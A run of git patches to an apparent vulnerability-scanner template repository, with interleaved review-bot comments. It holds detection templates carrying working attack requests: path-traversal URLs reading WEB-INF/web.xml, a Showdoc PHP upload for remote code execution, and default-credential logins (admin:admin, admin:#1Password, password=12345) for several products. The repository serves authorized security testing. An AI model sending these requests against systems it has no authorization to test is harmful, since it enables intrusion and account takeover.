From: sandeep Date: Sat, 17 Jul 2021 21:44:56 +0530 Subject: [PATCH 118/132] matcher update --- cves/2013/CVE-2013-3827.yaml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml index af44677113..d6883d7e82 100644 --- a/cves/2013/CVE-2013-3827.yaml +++ b/cves/2013/CVE-2013-3827.yaml @@ -1,11 +1,14 @@ id: CVE-2013-3827 info: - name: CVE-2013-3827 + name: Javafaces LFI author: Random-Robbie severity: medium - description: Javafaces LFI - tags: cve,cve2013,lfi + description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container. + tags: cve,cve2013,lfi,javafaces,oracle + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2013-3827 + - https://www.exploit-db.com/exploits/38802 requests: - method: GET @@ -20,9 +23,16 @@ requests: - "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF" - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." + matchers-condition: and matchers: - type: word words: - - "web-app version" + - "" part: body + condition: and + + - type: status + status: + - 200 \ No newline at end of file From e0bbc7f160283ab969254b1f6af325c1c230bb18 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 16:20:40 +0000 Subject: [PATCH 119/132] Auto Update README [Sat Jul 17 16:20:39 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 90de9948ae..42c3fbe9e1 100644 --- a/README.md 
+++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 459 | vulnerabilities | 236 | exposed-panels | 200 | +| cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 124 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 38 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**129 directories, 1588 files**. +**129 directories, 1589 files**. From 1212034229b838e528740999577b12350f13e005 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 16:40:05 +0000 Subject: [PATCH 120/132] Auto Update README [Sat Jul 17 16:40:05 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 42c3fbe9e1..75a881f2a5 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 124 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | -| default-logins | 38 | file | 42 | dns | 10 | +| default-logins | 39 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**129 directories, 1589 files**. +**130 directories, 1590 files**. From e4f51a0286c2a7e94f926236c20466ce9244dc0d Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 22:14:18 +0530 Subject: [PATCH 121/132] Update sap-igs-detect.yaml --- technologies/sap-igs-detect.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/technologies/sap-igs-detect.yaml b/technologies/sap-igs-detect.yaml index bab13679aa..5f57fd013e 100644 
--- a/technologies/sap-igs-detect.yaml +++ b/technologies/sap-igs-detect.yaml @@ -31,7 +31,6 @@ requests: part: header words: - "SAP Internet Graphics Server" - condition: and extractors: - type: kval From 0debdc4cd18d37e23f4144095e0be5ca5501da94 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 16:45:21 +0000 Subject: [PATCH 122/132] Auto Update README [Sat Jul 17 16:45:21 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 75a881f2a5..461fb9793e 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | -| takeovers | 70 | exposures | 116 | technologies | 124 | +| takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 39 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**130 directories, 1590 files**. +**130 directories, 1591 files**. From 9eabca6e4caf3d03686a479b5e959ee7b67d0915 Mon Sep 17 00:00:00 2001 From: Prial Islam <25204004+0xPrial@users.noreply.github.com> Date: Sat, 17 Jul 2021 22:55:19 +0600 Subject: [PATCH 123/132] Updated Heroku and netlify takeover detection --- takeovers/heroku-takeover.yaml | 3 +-- takeovers/netlify-takeover.yaml | 6 +++--- 2 files changed, 4 insertions(+), 5 deletions(-) diff --git a/takeovers/heroku-takeover.yaml b/takeovers/heroku-takeover.yaml index 64115ff057..4a6ac2476e 100644 --- a/takeovers/heroku-takeover.yaml +++ b/takeovers/heroku-takeover.yaml 
@@ -2,7 +2,7 @@ id: heroku-takeover info: name: heroku takeover detection - author: pdteam + author: 0xPrial severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz @@ -15,7 +15,6 @@ requests: matchers: - type: word words: - - "There's nothing here, yet." - "herokucdn.com/error-pages/no-such-app.html" - "No such app" condition: and \ No newline at end of file diff --git a/takeovers/netlify-takeover.yaml b/takeovers/netlify-takeover.yaml index 9c447ac42f..02ec1285a5 100644 --- a/takeovers/netlify-takeover.yaml +++ b/takeovers/netlify-takeover.yaml @@ -2,7 +2,7 @@ id: netlify-takeover info: name: netlify takeover detection - author: pdteam + author: 0xPrial severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz @@ -16,9 +16,9 @@ requests: matchers: - type: word words: - - "Not Found" + - "Not found - Request ID:" - type: word words: - - "server: Netlify" + - "Netlify" part: header \ No newline at end of file From 63ae086b6792aec403dea53dde2b28082d01f004 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:02:43 +0530 Subject: [PATCH 124/132] Payload + matcher update --- .../other/showdoc-file-upload-rce.yaml | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/vulnerabilities/other/showdoc-file-upload-rce.yaml b/vulnerabilities/other/showdoc-file-upload-rce.yaml index a83e353f93..63fa6a1f77 100644 --- a/vulnerabilities/other/showdoc-file-upload-rce.yaml +++ b/vulnerabilities/other/showdoc-file-upload-rce.yaml @@ -1,4 +1,5 @@ id: showdoc-file-upload-rce + info: name: Showdoc < 2.8.6 File Upload RCE author: pikpikcu @@ -20,7 +21,7 @@ requests: Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" Content-Type: text/plain - + ----------------------------835846770881083140190633-- - | 
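Review bot: The header matcher at the end of the netlify hunk is loosened from `server: Netlify` to the bare token `Netlify`, which any header carrying that word satisfies (Via, X-Powered-By, a redirect Location), so unless `matchers-condition: and` is set above the hunk — nuclei's default is OR — a live, correctly claimed Netlify site is reported as a takeover on the header match alone. Make the body match mandatory by adding `matchers-condition: and` directly above `matchers:`, or restore a server-header-specific token. The enclosing `requests:` entry starts outside the hunk, and both takeover files are left without a trailing newline (`\ No newline at end of file`).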
@@ -37,11 +38,12 @@ requests: regex: - '/Uploads\\(.*?)"\,"success"' - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'contains(body_2, "PHP Extension")' - - 'contains(body_2, "PHP Version")' - - 'status_code_2 == 200' - condition: and + - type: word + words: + - '3c7cb9f46815a790686b857fdbc4295a' + + - type: status + status: + - 200 \ No newline at end of file From 7ef332e9d07920ee088a672d3405940406d97458 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:20:57 +0530 Subject: [PATCH 125/132] Added VisionHub Default Credentials --- .../visionhub-default-credentials.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 default-logins/visionhub/visionhub-default-credentials.yaml diff --git a/default-logins/visionhub/visionhub-default-credentials.yaml b/default-logins/visionhub/visionhub-default-credentials.yaml new file mode 100644 index 0000000000..c4bb066e85 --- /dev/null +++ b/default-logins/visionhub/visionhub-default-credentials.yaml @@ -0,0 +1,27 @@ +id: visionhub-default-credentials + +info: + name: VisionHub Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of admin:admin on VisionHub application. + tags: visionhub,default-login + reference: https://www.qognify.com/products/visionhub/ + +requests: + - method: POST + path: + - '{{BaseURL}}/VisionHubWebApi/api/Login' + headers: + Authorization: Basic YWRtaW46YWRtaW4= + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: admin" + part: header + + - type: status + status: + - 200 \ No newline at end of file From f58d78772492b0db1e828671eb33ac74a647410a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 17:53:56 +0000 Subject: [PATCH 126/132] Auto Update README [Sat Jul 17 17:53:56 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 461fb9793e..b5c762b493 100644 
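Review bot: The replacement matchers lose the response binding the removed DSL had (`body_2`, `status_code_2`): with several raw requests in this template and `req-condition` removed, the word and status matchers are evaluated against every response, so a 200 on the upload request that happens to echo the string also satisfies them. If the check is meant for the second response only, keep `req-condition: true` and express it as a `dsl` matcher using `contains(body_2, "3c7cb9f46815a790686b857fdbc4295a")` together with `status_code_2 == 200`, as the removed lines did. The bare hex constant also needs a comment saying what it is expected to be (presumably output of the uploaded probe — confirm from the request above the hunk), e.g. `# expected output of the uploaded probe; see request 1`. The enclosing request starts outside the hunk.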
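Review bot: `Authorization: Basic YWRtaW46YWRtaW4=` is an opaque constant that a maintainer must decode to confirm it matches the `admin:admin` named in `description`; annotate it inline, `Authorization: Basic YWRtaW46YWRtaW4=  # base64("admin:admin")`, or, if the nuclei version in use supports helper functions in headers, build it as `{{base64("admin:admin")}}` so the pair is readable. The `reference` is the vendor's product page rather than documentation of the default account, which gives a reviewer nothing to verify the credential against; if no vendor note exists, say so in `description`. The `Set-Cookie: admin` word is a substring match, so any cookie whose name begins with `admin` also satisfies it — acceptable only because `matchers-condition: and` requires the 200 too, which is worth a comment. The file is added without a trailing newline.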
--- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | -| default-logins | 39 | file | 42 | dns | 10 | +| default-logins | 40 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**130 directories, 1591 files**. +**131 directories, 1592 files**. From 08324918439629cc2b2055a2d6a3b3c935ab6ac2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:28:19 +0530 Subject: [PATCH 127/132] Added Dell EMC ECOM Default Credentials --- .../dell-emc-ecom-default-credentials.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 default-logins/dell/dell-emc-ecom-default-credentials.yaml diff --git a/default-logins/dell/dell-emc-ecom-default-credentials.yaml b/default-logins/dell/dell-emc-ecom-default-credentials.yaml new file mode 100644 index 0000000000..5c46e83359 --- /dev/null +++ b/default-logins/dell/dell-emc-ecom-default-credentials.yaml @@ -0,0 +1,31 @@ +id: dell-emc-ecom-default-credentials + +info: + name: Dell EMC ECOM Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of admin:#1Password on Dell EMC ECOM application. + reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation + tags: dell,emc,ecom,default-login + +requests: + - method: GET + path: + - '{{BaseURL}}' + headers: + Authorization: Basic YWRtaW46IzFQYXNzd29yZA== + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: ECOMSecurity" + part: header + + - type: word + words: + - "Welcome to ECOM" + + - type: status + status: + - 200 \ No newline at end of file 
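Review bot: The probe is sent to `{{BaseURL}}` itself rather than to an ECOM-specific path, so the template relies entirely on the matchers to avoid misreporting whatever serves the host root; that is tolerable because `matchers-condition: and` requires the `ECOMSecurity` cookie, the `Welcome to ECOM` body and a 200 together, but a comment above `path:` should state that the ECOM console is expected at the root (the referenced KB article does not show this — confirm). The Basic header should be annotated like the sibling templates, `Authorization: Basic YWRtaW46IzFQYXNzd29yZA==  # base64("admin:#1Password")`; the value does decode to the pair named in `description`. The file is added without a trailing newline.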
From 8030b4635519e05fb0c5dd0c710a0f9a00f95a77 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:30:55 +0530 Subject: [PATCH 128/132] Added HortonWorks SmartSense Default Credentials --- ...nworks-smartsense-default-credentials.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml diff --git a/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml b/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml new file mode 100644 index 0000000000..132cee76fd --- /dev/null +++ b/default-logins/hortonworks/hortonworks-smartsense-default-credentials.yaml @@ -0,0 +1,31 @@ +id: hortonworks-smartsense-default-credentials + +info: + name: HortonWorks SmartSense Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of admin:admin on HortonWorks SmartSense application. + reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html + tags: hortonworks,smartsense,default-login + +requests: + - method: GET + path: + - '{{BaseURL}}/apt/v1/context' + headers: + Authorization: Basic YWRtaW46YWRtaW4= + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: SUPPORTSESSIONID" + part: header + + - type: word + words: + - "smartsenseId" + + - type: status + status: + - 200 \ No newline at end of file From 78e7242792d12292cf77cade1a7e49903e7d789a Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:35:39 +0530 Subject: [PATCH 129/132] Added Palo Alto Networks PAN-OS Default Credentials --- .../paloalto/panos-default-credentials.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 default-logins/paloalto/panos-default-credentials.yaml 
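Review bot: The request path `/apt/v1/context` looks like a typo for `/api/v1/context` — the `smartsenseId` body match is a JSON field name and the segment is otherwise API-style — and a misspelt path would make the template never fire rather than produce a false positive; confirm against the referenced SmartSense manual before merge. The Basic header should carry the same `# base64("admin:admin")` annotation suggested for the sibling templates so the credential pair can be checked against `description` without decoding. The file is added without a trailing newline.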
diff --git a/default-logins/paloalto/panos-default-credentials.yaml b/default-logins/paloalto/panos-default-credentials.yaml new file mode 100644 index 0000000000..15bc58afa5 --- /dev/null +++ b/default-logins/paloalto/panos-default-credentials.yaml @@ -0,0 +1,31 @@ +id: panos-default-credentials + +info: + name: Palo Alto Networks PAN-OS Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of admin:admin on Palo Alto Networks PAN-OS application. + reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. + tags: paloalto,panos,default-login + +requests: + - method: POST + path: + - '{{BaseURL}}/php/login.php' + + body: user=admin&passwd=admin&challengePwd=&ok=Login + + matchers-condition: and + matchers: + - type: word + words: + - "Set-Cookie: PHPSESSID" + part: header + + - type: word + words: + - "Warning: Your device is still configured with the default admin" + + - type: status + status: + - 200 \ No newline at end of file From 9e85e024d3090c0070fc28960c58a9330ff45dc0 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:51:55 +0530 Subject: [PATCH 130/132] Added IDEMIA BIOMetrics Default Credentials --- ...idemia-biometrics-default-credentials.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 default-logins/idemia/idemia-biometrics-default-credentials.yaml diff --git a/default-logins/idemia/idemia-biometrics-default-credentials.yaml b/default-logins/idemia/idemia-biometrics-default-credentials.yaml new file mode 100644 index 0000000000..da3d4290e4 --- /dev/null +++ b/default-logins/idemia/idemia-biometrics-default-credentials.yaml 
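Review bot: The POST carries a form body (`user=admin&passwd=admin&challengePwd=&ok=Login`) but sets no `Content-Type`; if the nuclei version in use does not default a string body to `application/x-www-form-urlencoded`, the login handler will not parse the fields and the template silently never matches, so add `headers:` with `Content-Type: application/x-www-form-urlencoded` beneath `path:`. The body match on the vendor's own banner `Warning: Your device is still configured with the default admin` is the specific signal here and deserves a comment saying so, since the `PHPSESSID` cookie and a 200 alone are satisfied by any PHP login page. The file is added without a trailing newline.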
@@ -0,0 +1,34 @@ +id: idemia-biometrics-default-credentials + +info: + name: IDEMIA BIOMetrics Default Credentials + author: Techryptic (@Tech) + severity: high + description: Default Credentials of password=12345 on IDEMIA BIOMetrics application. + reference: https://www.google.com/search?q=idemia+password%3D+"12345" + tags: idemia,biometrics,default-login + +requests: + - method: POST + path: + - '{{BaseURL}}/cgi-bin/login.cgi' + + body: password=12345 + + matchers-condition: and + matchers: + - type: word + words: + - "session_id=" + - "resource" + condition: and + + - type: word + words: + - "Invalid Password" + part: body + negative: true + + - type: status + status: + - 200 \ No newline at end of file From 14dac081716f55f25123085e2e8d557be8bbf373 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 17 Jul 2021 18:23:30 +0000 Subject: [PATCH 131/132] Auto Update README [Sat Jul 17 18:23:29 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b5c762b493..b6fb139ccd 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 460 | vulnerabilities | 236 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 125 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | -| default-logins | 40 | file | 42 | dns | 10 | +| default-logins | 44 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**131 directories, 1592 files**. +**134 directories, 1596 files**. From d2970f3529e9ad17d0d42fb04c27b02361aeb45e Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 17 Jul 2021 23:55:56 +0530 Subject: [PATCH 132/132] misc changes --- takeovers/heroku-takeover.yaml | 2 +- takeovers/netlify-takeover.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/heroku-takeover.yaml b/takeovers/heroku-takeover.yaml index 4a6ac2476e..a6e03e96ac 100644 
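Review bot: The `reference` is a Google search URL, not a source: it is unstable and cannot be used to verify the claimed default, so replace it with the vendor or installer documentation that states the default password, or drop the key and say in `description` that no vendor note was found. The second word of the positive matcher, `resource`, is generic enough to appear in error pages and JSON responses alike; it is only acceptable because `condition: and` ties it to `session_id=` and the negative `Invalid Password` match, and a comment above the matcher should say so. `body: password=12345` duplicates the value given in `description` — keep the two in sync if either changes. The file is added without a trailing newline.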
--- a/takeovers/heroku-takeover.yaml +++ b/takeovers/heroku-takeover.yaml @@ -2,7 +2,7 @@ id: heroku-takeover info: name: heroku takeover detection - author: 0xPrial + author: 0xPrial,pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz diff --git a/takeovers/netlify-takeover.yaml b/takeovers/netlify-takeover.yaml index 02ec1285a5..58c0306995 100644 --- a/takeovers/netlify-takeover.yaml +++ b/takeovers/netlify-takeover.yaml @@ -2,7 +2,7 @@ id: netlify-takeover info: name: netlify takeover detection - author: 0xPrial + author: 0xPrial,pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz